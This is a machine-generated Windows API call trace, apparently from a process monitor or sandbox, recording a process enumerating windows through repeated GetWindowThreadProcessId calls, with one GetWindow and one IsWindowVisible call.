	[0471.287] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xea4
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x514
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe48
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbc8
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdf8
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x318
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xcac
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8bc
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf9c
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf48
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe40
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xecc
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xeb8
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe80
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe98
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe60
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xee4
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf00
	[0471.288] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdf0
	[0471.289] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe1c
	[0471.289] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdd0
	[0471.289] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd94
	[0471.289] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd74
	[0471.289] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd00
	[0471.289] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xcd8
	[0471.290] GetWindow (hWnd=0x1035e, uCmd=0x4) returned 0x0
	[0471.291] IsWindowVisible (hWnd=0x1035e) returned 0
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc84
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xca4
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc64
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc24
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb84
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbac
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x384
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xab8
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x33c
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa44
	[0471.291] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa64
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8a8
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xaf0
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x88c
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb04
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x910
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x230
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xac0
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xab4
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xaac
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x3d0
	[0471.292] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x978
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa7c
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x59c
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa88
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa6c
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa68
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x9f8
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa04
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x924
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8dc
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7dc
	[0471.293] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x768
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x764
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x820
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x810
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x794
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x83c
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7ac
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb44
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb5c
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x838
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.294] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x818
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x5b8
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x494
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1ec
	[0471.295] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x440
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7e8
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x730
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x2c8
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x31c
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x330
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x128
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x5c8
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x6f8
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x358
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x73c
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb0
	[0471.296] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x250
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x240
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x790
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x61c
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x568
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x568
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0471.297] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x57c
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x554
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x528
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x79c
	[0471.298] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4e0
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x44c
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x558
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.299] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1198
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1080
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1074
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x106c
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1474
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1414
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbd0
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x550
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa38
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16d0
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16d4
	[0471.300] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x15bc
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x15a0
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x159c
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1598
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1594
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1590
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x158c
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1588
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1584
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1580
	[0471.301] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x157c
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1488
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1404
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11b8
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbd4
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe0c
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd30
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe70
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13b8
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe20
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe2c
	[0471.302] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe00
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe04
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc94
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13b0
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13ac
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13a8
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1374
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x132c
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1328
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12d0
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12cc
	[0471.303] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12c8
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1290
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1218
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1214
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11ec
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11e8
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11cc
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1140
	[0471.304] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe6c
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x6e8
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc6c
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf94
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xffc
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf74
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf08
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf0c
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xed8
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe90
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xea8
	[0471.306] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfa8
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfbc
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfb8
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfb4
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfb0
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfac
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfc0
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfd0
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf88
	[0471.307] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf84
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf80
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xde0
